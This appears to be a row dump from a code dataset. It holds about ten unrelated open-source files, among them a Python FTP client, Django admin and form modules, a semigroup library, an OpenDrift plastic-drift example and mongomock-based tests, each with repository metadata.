repo_name
stringlengths 5
92
| path
stringlengths 4
221
| copies
stringclasses 19
values | size
stringlengths 4
6
| content
stringlengths 766
896k
| license
stringclasses 15
values | hash
int64 -9,223,277,421,539,062,000
9,223,102,107B
| line_mean
float64 6.51
99.9
| line_max
int64 32
997
| alpha_frac
float64 0.25
0.96
| autogenerated
bool 1
class | ratio
float64 1.5
13.6
| config_test
bool 2
classes | has_no_keywords
bool 2
classes | few_assignments
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
dvstter/SelfPythonSmallTools
|
ftp_server/client.py
|
1
|
1463
|
import socket
import struct
import math
class client:
def init_client(self, address, port):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
self.sock.connect((address.strip(), int(port)))
except socket.error, e:
print 'error:%s' % e
def main_loop(self):
while True:
cmd = raw_input('>')
if cmd == 'quit':
self.sock.send('quit')
self.sock.close()
break
elif cmd == 'list':
self.sock.send(cmd)
result = self.sock.recv(1024)
if result != '':
print result,
elif cmd[:5] == 'fetch':
self.sock.send(cmd)
self.get_file()
else:
print 'command did not recognised'
def get_file(self):
res = self.sock.recv(5)
if res == 'error':
print 'error occured...'
return
num_info = self.sock.recv(8)
# recieve file size and file name size
file_size, filename_size = struct.unpack('2i', num_info)
# recieve file name to create new file
filename = self.sock.recv(filename_size)
print 'fetching file %% destination:%s' % filename
# open file to write
fid = open(filename, 'wb')
for x in range(int(math.ceil(file_size/1024.0))):
chunk = self.sock.recv(1024)
fid.write(chunk)
fid.close()
print 'file transmitted over...'
if __name__ == '__main__':
c = client()
#address = raw_input('ftp server ip address:')
# port = raw_input('ftp server port number:')
address = 'localhost'
port = '8080'
c.init_client(address=address, port=port)
c.main_loop()
|
gpl-2.0
| -1,645,092,799,523,094,300
| 24.224138
| 63
| 0.640465
| false
| 2.902778
| false
| false
| false
|
proofchains/python-smartcolors
|
smartcolors/db.py
|
1
|
8363
|
# Copyright (C) 2014 Peter Todd <pete@petertodd.org>
#
# This file is part of python-smartcolors.
#
# It is subject to the license terms in the LICENSE file found in the top-level
# directory of this distribution.
#
# No part of python-smartcolors, including this file, may be copied, modified,
# propagated, or distributed except according to the terms contained in the
# LICENSE file.
import os
import tempfile
from bitcoin.core import b2x, b2lx, lx, x
import bitcoin.core
import bitcoin.core.script
import smartcolors.core.db
import smartcolors.io
class PersistentSet:
"""File-backed set"""
def __init__(self, *, root_dir_path):
self.root_dir_path = os.path.abspath(root_dir_path)
def _get_elem_filename(self, elem):
raise NotImplementedError
def _serialize_elem(self, elem):
raise NotImplementedError
def _deserialize_elem(self, fd):
raise NotImplementedError
def add(self, elem):
# No effect if element is already present
if elem in self:
return
elem_filename = self._get_elem_filename(elem)
os.makedirs(self.root_dir_path, exist_ok=True)
# Write the element to disk as a new temporary file in the directory
with tempfile.NamedTemporaryFile(dir=self.root_dir_path, prefix=elem_filename + '-tmp-') as fd:
self._serialize_elem(elem, fd)
fd.flush()
# Hardlink the file to it's correct name, which atomically makes it
# available to readers. The temporary name will be unlinked for us
# by NamedTemporaryFile.
try:
os.link(fd.name, os.path.join(self.root_dir_path, elem_filename))
except FileExistsError as exp:
# FIXME: actually handle this!
raise exp
def __iter__(self):
try:
elem_filenames = os.listdir(self.root_dir_path)
except FileNotFoundError as exp:
return
for elem_filename in elem_filenames:
with open(os.path.join(self.root_dir_path, elem_filename), 'rb') as fd:
yield self._deserialize_elem(fd)
def __contains__(self, elem):
elem_filename = self._get_elem_filename(elem)
return os.path.exists(os.path.join(self.root_dir_path, elem_filename))
class PersistentDict:
"""File-backed set"""
def __init__(self, *, root_dir_path):
self.root_dir_path = os.path.abspath(root_dir_path)
def _key_to_filename(self, key):
raise NotImplementedError
def _filename_to_key(self, filename):
raise NotImplementedError
def _get_item(self, key_abspath):
raise NotImplementedError
def _key_to_abspath(self, key):
return os.path.join(self.root_dir_path, self._key_to_filename(key))
def __contains__(self, key):
return os.path.exists(self._key_to_abspath(key))
def __getitem__(self, key):
key_abspath = self._key_to_abspath(key)
if not os.path.exists(key_abspath):
raise KeyError(key)
else:
return self._get_item(key_abspath)
def get(self, key, default_value=None):
try:
return self[key]
except KeyError:
return default_value
def __setitem__(self, key, value):
raise NotImplementedError
def setdefault(self, key, default_value=None):
try:
return self[key]
except KeyError:
pass
return default_value
def __iter__(self):
try:
key_filenames = os.listdir(self.root_dir_path)
except FileNotFoundError as exp:
return
for key_filename in key_filenames:
yield self._filename_to_key(key_filename)
def keys(self):
yield from self.__iter__()
def values(self):
yield from [self[key] for key in self.keys()]
def items(self):
for key in self:
yield (key, self[key])
class PersistentColorDefSet(PersistentSet):
def _get_elem_filename(self, colordef):
return b2x(colordef.hash) + '.scdef'
def _serialize_elem(self, colordef, fd):
smartcolors.io.ColorDefFileSerializer.stream_serialize(colordef, fd)
def _deserialize_elem(self, fd):
return smartcolors.io.ColorDefFileSerializer.stream_deserialize(fd)
class PersistentColorProofSet(PersistentSet):
def _get_elem_filename(self, colorproof):
return b2x(colorproof.hash) + '.scproof'
def _serialize_elem(self, colorproof, fd):
smartcolors.io.ColorProofFileSerializer.stream_serialize(colorproof, fd)
def _deserialize_elem(self, fd):
return smartcolors.io.ColorProofFileSerializer.stream_deserialize(fd)
class PersistentGenesisOutPointsDict(PersistentDict):
def _key_to_filename(self, outpoint):
return '%s:%d' % (b2lx(outpoint.hash), outpoint.n)
def _filename_to_key(self, filename):
hex_hash, str_n = filename.split(':')
return bitcoin.core.COutPoint(lx(hex_hash), int(str_n))
def _get_item(self, key_abspath):
return PersistentColorDefSet(root_dir_path=key_abspath)
def setdefault(self, key, default_value=None):
assert default_value == set()
default_value = PersistentColorDefSet(root_dir_path=self._key_to_abspath(key))
return super().setdefault(key, default_value=default_value)
class PersistentGenesisScriptPubKeysDict(PersistentDict):
def _key_to_filename(self, scriptPubKey):
if scriptPubKey:
return b2x(scriptPubKey)
else:
# gotta handle the empty case!
return '_'
def _filename_to_key(self, filename):
if filename == '_':
return bitcoin.core.script.CScript()
else:
return bitcoin.core.script.CScript(x(filename))
def _get_item(self, key_abspath):
return PersistentColorDefSet(root_dir_path=key_abspath)
def setdefault(self, key, default_value=None):
assert default_value == set()
default_value = PersistentColorDefSet(root_dir_path=self._key_to_abspath(key))
return super().setdefault(key, default_value=default_value)
class PersistentColorProofsByColorDefDict(PersistentDict):
def _key_to_filename(self, colordef):
return b2x(colordef.hash)
def _filename_to_key(self, filename):
# Bit of a hack to say the least...
colordef_filename = os.path.join(self.root_dir_path, '..', '..', 'colordefs', filename + '.scdef')
with open(colordef_filename, 'rb') as fd:
return smartcolors.io.ColorDefFileSerializer.stream_deserialize(fd)
def _get_item(self, key_abspath):
return PersistentColorProofSet(root_dir_path=key_abspath)
def setdefault(self, key, default_value=None):
assert default_value == set()
default_value = PersistentColorProofSet(root_dir_path=self._key_to_abspath(key))
return super().setdefault(key, default_value=default_value)
class PersistentColoredOutPointsDict(PersistentDict):
def _key_to_filename(self, outpoint):
return '%s:%d' % (b2lx(outpoint.hash), outpoint.n)
def _filename_to_key(self, filename):
hex_hash, str_n = filename.split(':')
return bitcoin.core.COutPoint(lx(hex_hash), int(str_n))
def _get_item(self, key_abspath):
return PersistentColorProofsByColorDefDict(root_dir_path=key_abspath)
def setdefault(self, key, default_value=None):
assert default_value == {}
default_value = PersistentColorProofsByColorDefDict(root_dir_path=self._key_to_abspath(key))
return super().setdefault(key, default_value=default_value)
class PersistentColorProofDb(smartcolors.core.db.ColorProofDb):
def __init__(self, root_dir_path):
self.root_dir_path = os.path.abspath(root_dir_path)
self.colordefs = PersistentColorDefSet(root_dir_path=os.path.join(self.root_dir_path, 'colordefs'))
self.genesis_outpoints = PersistentGenesisOutPointsDict(root_dir_path=os.path.join(self.root_dir_path, 'genesis_outpoints'))
self.genesis_scriptPubKeys = PersistentGenesisScriptPubKeysDict(root_dir_path=os.path.join(self.root_dir_path, 'genesis_scriptPubKeys'))
self.colored_outpoints = PersistentColoredOutPointsDict(root_dir_path=os.path.join(self.root_dir_path, 'colored_outpoints'))
|
gpl-3.0
| 4,823,416,512,252,157,000
| 32.8583
| 144
| 0.656343
| false
| 3.664768
| false
| false
| false
|
hetica/webeni
|
static/lib/cisco_clt.py
|
1
|
3492
|
#!/usr/bin/python
# *-* coding:utf-8 *-*
__appname__ = 'pytacad-clt'
__version__ = "0.1"
__author__ = "Benoit Guibert <benoit.guibert@free.fr>"
__licence__ = ""
import os, sys
import unicodedata
from django.utils.encoding import smart_unicode
server = os.path.dirname(sys.argv[0]) + '/pytacad-server'
cwd = '/var/local/pytacad/'
dirClasses = cwd + 'classes'
os.chdir(cwd)
def find_user(search_str=None):
""" Chercher un utilisateur """
f = open('liste_stagiaires')
c = f.readlines() # c : contenu avec une liste des lignes
nb = 0
list_stag = []
for a in c:
if unicodedata.normalize("NFKD", smart_unicode(search_str.lower(), 'utf-8')).encode('ascii', 'ignore') in unicodedata.normalize("NFKD", smart_unicode(a.lower(), 'utf-8')).encode('ascii', 'ignore'):
list_stag.append(a)
nb +=1
return (nb, list_stag)
def afficher_stags(stags):
""" mettre en forme l'affichage """
result = ""
for stag in stags:
s = stag.split(';')
result += 'Stagiaire : \t{0} {1} ({2})\n'.format(s[1], s[0], s[3])
for i,a in enumerate(stag.split(';')[5].split(',')):
if i == 0: result += 'Classes :\t' + a + '\n'
else : result += ('\t\t{0}\n'.format(a))
return result
def find_classe(search_str=None):
"""Chercher une ou des classes"""
l = os.listdir(dirClasses)
classes_found = ""
allclasses = ""
nb = 0
for i, a in enumerate(l):
# allclasses += a.split('.')[0].split('classe_')[1] + "\n"
allclasses += a.split('.')[0] + "\n"
if search_str.lower() in a.lower():
classe = a
# classes_found += a.split('.')[0].split('classe_')[1] + "\n"
classes_found += a.split('.')[0] + "\n"
nb += 1
if nb == 0:
# si aucune classe trouvée, les afficher toutes
mesg = "Aucune classe n'a été trouvée\n"
mesg += "Liste des classes de l'académie\n\n"
mesg += allclasses
return mesg
if nb == 1:
# si une classe trouvée, afficher les stagaires la composant
fic = dirClasses + "/" + classe
f = open(fic, 'r')
mesg = f.read()
f.close()
return mesg
if nb > 1:
# si plusieurs classes trouvées, afficher celles trouvées
mesg = str(nb) + " classes trouvées\n"
mesg += "Affinez votre recherche\n\n"
mesg += classes_found
return mesg
"""
def infos():
os.system('clear')
print("\n INFOS GENERALES\n")
f = open('liste_stagiaires').readlines()
print(" Nombre de stagiaires : {0}".format(len(f)))
classes = os.listdir(dirClasses)
print(" Nombre de classes : {0}".format(len(classes)))
c = raw_input("\n Tapez sur une touche pour revenir au menu,\n ou 'c' pour afficher les noms des classes... ")
if c == "c":
os.system('clear')
for a in classes:
fclasse = open("./classes/" + a)
print(fclasse.readlines()[1].split(": ")[1].rstrip())
raw_input("\n Tapez sur une touche pour revenir au menu")
"""
"""
def maj_bd():
os.system('clear')
print("\n MISE A JOUR DE LA BASE DE DONNEES")
print(" ---------------------------------\n")
print(' La base de données est mise à jour 2 fois par jour, à 8H30 et 13H30.')
print(' Il est cependant possible de forcer une mise à jour ponctuelle en cas de besoin.')
print(" Celle-ci peut durer plusieurs minutes car il faut télécharger des pages Web sur Internet")
c = raw_input("\n Voulez-vous mettre la base de donnée à jour (taper 'y' pour accepter) ? ")
if c == "y":
print(" Merci de patienter...\n")
os.system(server)
print("\n La mise à jour est terminée")
raw_input("\n Tapez sur une touche pour revenir au menu... ")
"""
if __name__ == "__main__" :
menu()
|
lgpl-3.0
| 5,053,427,114,607,111,000
| 30.572727
| 199
| 0.624532
| false
| 2.498561
| false
| false
| false
|
KanoComputing/kano-apps
|
kano_apps/MainWindow.py
|
1
|
4372
|
# MainWindow.py
#
# Copyright (C) 2014-2018 Kano Computing Ltd.
# License: http://www.gnu.org/licenses/gpl-2.0.txt GNU GPLv2
#
# The MainWindow class
from gi import require_version
require_version('Gtk', '3.0')
from gi.repository import Gtk, Gdk
from kano_apps import Media
from kano_apps.UIElements import Contents
from kano_apps.AppGrid import Apps
from kano_apps.AppData import get_applications, refresh_package_list
from kano_apps.AppInstaller import AppInstaller
from kano.gtk3.top_bar import TopBar
from kano.gtk3.application_window import ApplicationWindow
from kano.gtk3.kano_dialog import KanoDialog
try:
from kano_profile.tracker import Tracker
kanotracker = Tracker()
except:
pass
class MainWindow(ApplicationWindow):
def __init__(self, install=None, icon_only=False, tutorial=False):
ApplicationWindow.__init__(self, 'Apps', 755, 588)
self._install = install
self._tutorial = tutorial
self._icon_only = icon_only
self._last_page = 0
self.connect("show", self._app_loaded)
# Destructor
self.connect('delete-event', Gtk.main_quit)
self.set_icon_from_file("/usr/share/kano-desktop/icons/apps.png")
# Styling
screen = Gdk.Screen.get_default()
specific_css_provider = Gtk.CssProvider()
specific_css_provider.load_from_path(Media.media_dir() +
'css/style.css')
specific_style_context = Gtk.StyleContext()
specific_style_context.add_provider_for_screen(
screen,
specific_css_provider,
Gtk.STYLE_PROVIDER_PRIORITY_USER
)
style = self.get_style_context()
style.add_class('main_window')
# Setup widgets
self.set_decorated(True)
self._top_bar = TopBar(_("Apps"), self._win_width, False)
self._top_bar.set_close_callback(Gtk.main_quit)
self.set_titlebar(self._top_bar)
self._contents = Contents(self)
self.set_main_widget(self._contents)
self.show_apps_view()
def get_main_area(self):
return self._contents
def get_last_page(self):
return self._last_page
def set_last_page(self, last_page_num):
self._last_page = last_page_num
def show_apps_view(self, button=None, event=None):
self._top_bar.disable_prev()
self._apps = apps = Apps(get_applications(), self)
self.get_main_area().set_contents(apps)
def refresh(self, category=None):
for app in get_applications():
if self._apps.has_app(app):
self._apps.update_app(app)
else:
self._apps.add_app(app)
def _app_loaded(self, widget):
if self._install is not None:
self._install_apps()
elif self._tutorial:
self._show_icon_tutorial()
def _show_icon_tutorial(self):
try:
from kano_profile.apps import save_app_state_variable, load_app_state_variable
if load_app_state_variable('kano-apps', 'icon-tutorial-shown'):
return
else:
save_app_state_variable('kano-apps', 'icon-tutorial-shown', True)
except ImportError:
# ignore problems importing kano_profile, as we don't want it to
# be a dependency
pass
kdialog = KanoDialog(
_("Add more apps to the desktop"),
_(
"Click the '+' button to the right of the app name to "
"make it appear on the desktop. You can remove it again "
"by clicking on 'x'."
),
{
_("OK, GOT IT"): {
"return_value": 0,
"color": "green"
}
},
parent_window=self
)
kdialog.set_action_background("grey")
kdialog.title.description.set_max_width_chars(40)
kdialog.run()
def _install_apps(self):
pw = None
for app in self._install:
inst = AppInstaller(app, self._apps, pw, self)
inst.set_check_if_installed(True)
inst.set_icon_only(self._icon_only)
inst.install()
pw = inst.get_sudo_pw()
self.set_last_page(0)
refresh_package_list()
self.refresh()
|
gpl-2.0
| -7,431,524,287,024,962,000
| 30.007092
| 90
| 0.583486
| false
| 3.772217
| false
| false
| false
|
przemyslawjanpietrzak/pyMonet
|
pymonet/semigroups.py
|
1
|
5042
|
class Semigroup:
"""
In mathematics, a semigroup is an algebraic structure
consisting of a set together with an associative binary operation.
A semigroup generalizes a monoid in that there might not exist an identity element.
It also (originally) generalized a group (a monoid with all inverses)
to a type where every element did not have to have an inverse, this the name semigroup.
"""
def __init__(self, value):
self.value = value
def __eq__(self, other) -> bool:
return self.value == other.value
def fold(self, fn):
return fn(self.value)
@classmethod
def neutral(cls):
return cls(cls.neutral_element)
class Sum(Semigroup):
"""
Sum is a Monoid that will combine 2 numbers under addition.
"""
neutral_element = 0
def __str__(self) -> str: # pragma: no cover
return 'Sum[value={}]'.format(self.value)
def concat(self, semigroup: 'Sum') -> 'Sum':
"""
:param semigroup: other semigroup to concat
:type semigroup: Sum[B]
:returns: new Sum with sum of concat semigroups values
:rtype: Sum[A]
"""
return Sum(self.value + semigroup.value)
class All(Semigroup):
"""
All is a Monoid that will combine 2 values of any type using logical conjunction on their coerced Boolean values.
"""
neutral_element = True
def __str__(self) -> str: # pragma: no cover
return 'All[value={}]'.format(self.value)
def concat(self, semigroup: 'All') -> 'All':
"""
:param semigroup: other semigroup to concat
:type semigroup: All[B]
:returns: new All with last truly value or first falsy
:rtype: All[A | B]
"""
return All(self.value and semigroup.value)
class One(Semigroup):
"""
One is a Monoid that will combine 2 values of any type using logical disjunction OR on their coerced Boolean values.
"""
neutral_element = False
def __str__(self) -> str: # pragma: no cover
return 'One[value={}]'.format(self.value)
def concat(self, semigroup):
"""
:param semigroup: other semigroup to concat
:type semigroup: One[B]
:returns: new One with first truly value or last falsy
:rtype: One[A | B]
"""
return One(self.value or semigroup.value)
class First(Semigroup):
"""
First is a Monoid that will always return the first, value when 2 First instances are combined.
"""
def __str__(self) -> str: # pragma: no cover
return 'Fist[value={}]'.format(self.value)
def concat(self, semigroup):
"""
:param semigroup: other semigroup to concat
:type semigroup: First[B]
:returns: new First with first value
:rtype: First[A]
"""
return First(self.value)
class Last(Semigroup):
"""
Last is a Monoid that will always return the lastest, value when 2 Last instances are combined.
"""
def __str__(self) -> str: # pragma: no cover
return 'Last[value={}]'.format(self.value)
def concat(self, semigroup):
"""
:param semigroup: other semigroup to concat
:type semigroup: Last[B]
:returns: new Last with last value
:rtype: Last[A]
"""
return Last(semigroup.value)
class Map(Semigroup):
"""
Map is a Semigroup that will always return contated all values inside Map value
"""
def __str__(self) -> str: # pragma: no cover
return 'Map[value={}]'.format(self.value)
def concat(self, semigroup):
"""
:param semigroup: other semigroup to concat
:type semigroup: Map[B]
:returns: new Map with concated all values
:rtype: Map[A]
"""
return Map(
{key: value.concat(semigroup.value[key]) for key, value in self.value.items()}
)
class Max(Semigroup):
"""
Max is a Monoid that will combines 2 numbers, resulting in the largest of the two.
"""
neutral_element = -float("inf")
def __str__(self) -> str: # pragma: no cover
return 'Max[value={}]'.format(self.value)
def concat(self, semigroup):
"""
:param semigroup: other semigroup to concat
:type semigroup: Max[B]
:returns: new Max with largest value
:rtype: Max[A | B]
"""
return Max(self.value if self.value > semigroup.value else semigroup.value)
class Min(Semigroup):
"""
Min is a Monoid that will combines 2 numbers, resulting in the smallest of the two.
"""
neutral_element = float("inf")
def __str__(self) -> str: # pragma: no cover
return 'Min[value={}]'.format(self.value)
def concat(self, semigroup):
"""
:param semigroup: other semigroup to concat
:type semigroup: Min[B]
:returns: new Min with smallest value
:rtype: Min[A | B]
"""
return Min(self.value if self.value <= semigroup.value else semigroup.value)
|
mit
| -2,265,434,369,184,133,000
| 27.485876
| 120
| 0.601349
| false
| 3.701909
| false
| false
| false
|
celiao/django-rest-authemail
|
authemail/admin.py
|
1
|
3085
|
from django.contrib import admin
from django.contrib.auth import get_user_model
from django.contrib.auth.admin import UserAdmin
from django.utils.translation import ugettext_lazy as _
from authemail.forms import EmailUserCreationForm, EmailUserChangeForm
from authemail.models import SignupCode, PasswordResetCode, EmailChangeCode
class SignupCodeAdmin(admin.ModelAdmin):
list_display = ('code', 'user', 'ipaddr', 'created_at')
ordering = ('-created_at',)
readonly_fields = ('user', 'code', 'ipaddr')
def has_add_permission(self, request):
return False
class SignupCodeInline(admin.TabularInline):
model = SignupCode
fieldsets = (
(None, {
'fields': ('code', 'ipaddr', 'created_at')
}),
)
readonly_fields = ('code', 'ipaddr', 'created_at')
def has_add_permission(self, request):
return False
class PasswordResetCodeAdmin(admin.ModelAdmin):
list_display = ('code', 'user', 'created_at')
ordering = ('-created_at',)
readonly_fields = ('user', 'code')
def has_add_permission(self, request):
return False
class PasswordResetCodeInline(admin.TabularInline):
model = PasswordResetCode
fieldsets = (
(None, {
'fields': ('code', 'created_at')
}),
)
readonly_fields = ('code', 'created_at')
def has_add_permission(self, request):
return False
class EmailChangeCodeAdmin(admin.ModelAdmin):
list_display = ('code', 'user', 'email', 'created_at')
ordering = ('-created_at',)
readonly_fields = ('user', 'code', 'email')
def has_add_permission(self, request):
return False
class EmailChangeCodeInline(admin.TabularInline):
model = EmailChangeCode
fieldsets = (
(None, {
'fields': ('code', 'email', 'created_at')
}),
)
readonly_fields = ('code', 'email', 'created_at')
def has_add_permission(self, request):
return False
class EmailUserAdmin(UserAdmin):
fieldsets = (
(None, {'fields': ('email', 'password')}),
(_('Personal Info'), {'fields': ('first_name', 'last_name')}),
(_('Permissions'), {'fields': ('is_active', 'is_staff', 'is_superuser',
'groups', 'user_permissions')}),
(_('Important dates'), {'fields': ('last_login', 'date_joined')}),
)
add_fieldsets = (
(None, {
'classes': ('wide',),
'fields': ('email', 'password1', 'password2'),
}),
)
form = EmailUserChangeForm
add_form = EmailUserCreationForm
inlines = [SignupCodeInline, EmailChangeCodeInline, PasswordResetCodeInline]
list_display = ('email', 'is_verified', 'first_name', 'last_name',
'is_staff')
search_fields = ('first_name', 'last_name', 'email')
ordering = ('email',)
admin.site.register(get_user_model(), EmailUserAdmin)
admin.site.register(SignupCode, SignupCodeAdmin)
admin.site.register(PasswordResetCode, PasswordResetCodeAdmin)
admin.site.register(EmailChangeCode, EmailChangeCodeAdmin)
|
gpl-3.0
| -7,126,561,763,274,769,000
| 29.245098
| 80
| 0.621718
| false
| 3.851436
| false
| false
| false
|
simodalla/django-caronte
|
setup.py
|
1
|
1497
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
import caronte
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
version = caronte.__version__
if sys.argv[-1] == 'publish':
os.system('python setup.py sdist upload')
print("You probably want to also tag the version now:")
print(" git tag -a %s -m 'version %s'" % (version, version))
print(" git push --tags")
sys.exit()
readme = open('README.rst').read()
history = open('HISTORY.rst').read().replace('.. :changelog:', '')
setup(
name='django-caronte',
version=version,
description="""Your project description goes here""",
long_description=readme + '\n\n' + history,
author='Simone Dalla',
author_email='simodalla@gmail.com',
url='https://github.com/simodalla/django-caronte',
packages=[
'caronte',
],
include_package_data=True,
install_requires=[
],
license="BSD",
zip_safe=False,
keywords='django-caronte',
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Natural Language :: English',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
],
)
|
bsd-3-clause
| 5,328,639,089,583,490,000
| 26.218182
| 66
| 0.607882
| false
| 3.838462
| false
| true
| false
|
OpenDrift/opendrift
|
examples/example_plast.py
|
1
|
1520
|
#!/usr/bin/env python
"""
Plastic
==================================
"""
from datetime import timedelta
from opendrift.readers import reader_netCDF_CF_generic
from opendrift.models.plastdrift import PlastDrift
o = PlastDrift(loglevel=20)
o.list_configspec() # to see available configuration options
# Arome atmospheric model
reader_arome = reader_netCDF_CF_generic.Reader(o.test_data_folder() + '16Nov2015_NorKyst_z_surface/arome_subset_16Nov2015.nc')
# Norkyst ocean model
reader_norkyst = reader_netCDF_CF_generic.Reader(o.test_data_folder() + '16Nov2015_NorKyst_z_surface/norkyst800_subset_16Nov2015.nc')
o.add_reader([reader_norkyst, reader_arome])
start_time = reader_arome.start_time
end_time = reader_arome.start_time + timedelta(hours=5)
end_time = reader_arome.end_time
time = [start_time, start_time + timedelta(hours=5)]
#%%
# Seeding some particles
lon = 4.6; lat = 60.0; # Outside Bergen
o.seed_elements(lon, lat, radius=50, number=3000, time=time)
o.run(end_time=end_time, time_step=1800, time_step_output=3600)
#%%
# Second run, without wind/Stokes drift
o2 = PlastDrift(loglevel=20)
o2.add_reader([reader_norkyst])
o2.seed_elements(lon, lat, radius=50, number=3000, time=time)
o2.run(end_time=end_time, time_step=1800, time_step_output=3600)
#%%
# Print and plot results
print(o)
o.animation(compare=o2, fast=True,
legend=['Current + wind/Stokes drift', 'Current only'])
#o.animation(color='depth')
#o.plot_property('depth')
#%%
# .. image:: /gallery/animations/example_plast_0.gif
|
gpl-2.0
| 396,845,777,678,186,000
| 30.666667
| 133
| 0.721711
| false
| 2.690265
| false
| true
| false
|
rh-marketingops/dwm
|
dwm/test/test_val_g_lookup.py
|
1
|
1702
|
""" test generic validation lookup function """
import mongomock
#from mock import patch
#from nose.tools import raises
from dwm import Dwm
# Setup mongomock db
DB = mongomock.MongoClient().db
DB.genericLookup.insert({"find": "BADVALUE"})
# Setup Dwm instance
FIELDS = {
'field1': {
'lookup': ['genericLookup'],
'derive': []
},
'field2': {
'lookup': ['genericLookup'],
'derive': []
}
}
DWM = Dwm(name='test', mongo=DB, fields=FIELDS)
# Let the testing begin
def test_dwm_vg_lup_bad():
""" Ensure generic lookup occurs """
rec = {'field1': 'BADVALUE'}
rec_out, _ = DWM._val_g_lookup(rec, {}) #pylint: disable=W0212
assert rec_out == {'field1': ''}
def test_dwm_vg_lup_good():
""" Ensure good value not cleared """
rec = {'field1': 'GOODVALUE'}
rec_out, _ = DWM._val_g_lookup(rec, {}) #pylint: disable=W0212
assert rec_out == rec
def test_dwm_vg_lup_badcln():
""" Ensure basic lookup occurs and cleans value before """
rec = {'field1': ' badvalue\r\n '}
rec_out, _ = DWM._val_g_lookup(rec, {}) #pylint: disable=W0212
assert rec_out == {'field1': ''}
def test_dwm_vg_lup_badmulti():
""" Ensure lookup occurs on every field in config """
rec = {'field1': 'BADVALUE', 'field2': 'BADVALUE'}
rec_out, _ = DWM._val_g_lookup(rec, {}) #pylint: disable=W0212
assert rec_out == {'field1': '', 'field2': ''}
def test_dwm_vg_lup_leave():
""" Ensure lookup does not occur on field not in config """
rec = {'field1': 'BADVALUE', 'field3': 'BADVALUE'}
rec_out, _ = DWM._val_g_lookup(rec, {}) #pylint: disable=W0212
assert rec_out == {'field1': '', 'field3': 'BADVALUE'}
|
gpl-3.0
| 8,576,870,995,289,725,000
| 25.184615
| 66
| 0.596357
| false
| 3.044723
| true
| false
| false
|
mikesname/ehri-collections
|
ehriportal/portal/forms.py
|
1
|
6151
|
"""Portal search forms."""
import string
from django import forms
from django.contrib.admin import widgets
from django.utils import translation
from django.utils.translation import ugettext_lazy as _
from django.forms.models import modelformset_factory, inlineformset_factory
from jsonfield.forms import JSONFormField
from haystack.forms import EmptySearchQuerySet
from portal import models, data, utils
class PortalSearchForm(forms.Form):
ENTITIES = [models.Repository, models.Collection, models.Authority]
SORTFIELDS = (
("", _("Relevance")),
("name", _("Title/Name")),
("publication_date", _("Publication Date")),
("django_ct", _("Type")),
)
q = forms.CharField(required=False, label=_('Search'))
sort = forms.ChoiceField(required=False, choices=SORTFIELDS, label=_("Order By"))
def filter(self, sqs):
"""Filter a search queryset."""
self.sqs = sqs
if self.cleaned_data["sort"]:
self.sqs = self.sqs.order_by(self.cleaned_data["sort"])
if not self.cleaned_data["q"]:
return self.no_query_found()
return sqs.auto_query(self.cleaned_data["q"])
def no_query_found(self):
return self.sqs
class PortalAllSearchForm(PortalSearchForm):
"""Form representing the whole collection."""
# def no_query_found(self):
# return EmptySearchQuerySet()
class LanguageSelectWidget(forms.SelectMultiple):
choices = utils.language_choices()
def __init__(self, *args, **kwargs):
super(LanguageSelectWidget, self).__init__(*args, **kwargs)
class ScriptSelectWidget(forms.SelectMultiple):
choices = utils.script_choices()
class MapSearchForm(PortalSearchForm):
type = forms.ChoiceField(label=_('Type'), choices=(("Repository", "Repository"),
("Collection", "Collection")))
ne = forms.CharField(required=False, label=_('North East'),
widget=forms.HiddenInput())
sw = forms.CharField(required=False, label=_('South West'),
widget=forms.HiddenInput())
def no_query_found(self):
"""Show no results for a map search."""
return EmptySearchQuerySet()
def filter(self, sqs):
"""Filter a search set with geo-bounds."""
model = getattr(models, self.cleaned_data["type"])
sqs = sqs.models(model)
return super(MapSearchForm, self).filter(sqs)
class FacetListSearchForm(PortalSearchForm):
"""Extension of the search form with another field for
the order in which facets are sorted. Since we can't do
this natively with Haystack, we have to hack it ourselves.
"""
sort = forms.ChoiceField(required=False,
choices=(("count",_("Count")), ("name", _("Name"))))
class LanguageSelectFormField(JSONFormField):
def __init__(self, *args, **kwargs):
super(LanguageSelectFormField, self).__init__(*args, **kwargs)
self.widget = forms.SelectMultiple(choices=utils.language_choices())
class ScriptSelectFormField(JSONFormField):
def __init__(self, *args, **kwargs):
super(ScriptSelectFormField, self).__init__(*args, **kwargs)
self.widget = forms.SelectMultiple(choices=utils.script_choices())
class FuzzyDateForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
attrs={
'class':'input-small',
'placeholder': 'Start Date'
}
super(FuzzyDateForm, self).__init__(*args, **kwargs)
self.fields["start_date"].widget = widgets.AdminDateWidget(attrs=attrs)
self.fields["end_date"].widget = widgets.AdminDateWidget(attrs=attrs)
class Meta:
model = models.FuzzyDate
fields = ("start_date", "end_date",)
class OtherNameForm(forms.ModelForm):
class Meta:
fields = ("name",)
widgets = {
"name": forms.TextInput(attrs={'placeholder': _("Type another name here...")}),
}
class PortalEntityForm(forms.ModelForm):
# extra (non-model) field for revision comment
revision_comment = forms.CharField(required=False, widget=forms.TextInput(attrs={
"placeholder": _("Summary of changes (optional)"),
}))
class ContactForm(forms.ModelForm):
class Meta:
model = models.Contact
class CollectionEditForm(PortalEntityForm):
languages = LanguageSelectFormField()
languages_of_description = LanguageSelectFormField()
scripts = ScriptSelectFormField()
scripts_of_description = ScriptSelectFormField()
class Meta:
model = models.Collection
class RepositoryEditForm(PortalEntityForm):
languages = LanguageSelectFormField()
scripts = ScriptSelectFormField()
class Meta:
model = models.Repository
class AuthorityEditForm(PortalEntityForm):
languages = LanguageSelectFormField()
scripts = ScriptSelectFormField()
class Meta:
model = models.Authority
class RestoreRevisionForm(forms.Form):
"""Restore a revision of an object."""
def propertyformset_factory(topclass, propname):
propcls = models.propertyproxy_factory(propname)
return inlineformset_factory(
topclass, propcls, fields=("value",), extra=1)
# FIXME: !!! The OtherName formsets below are created using the Collection
# as the primary model, but they're also used in the repository and
# authority forms. This doesn't seem to matter, because when they're
# constructed the primary model seems to be overridden by the instance
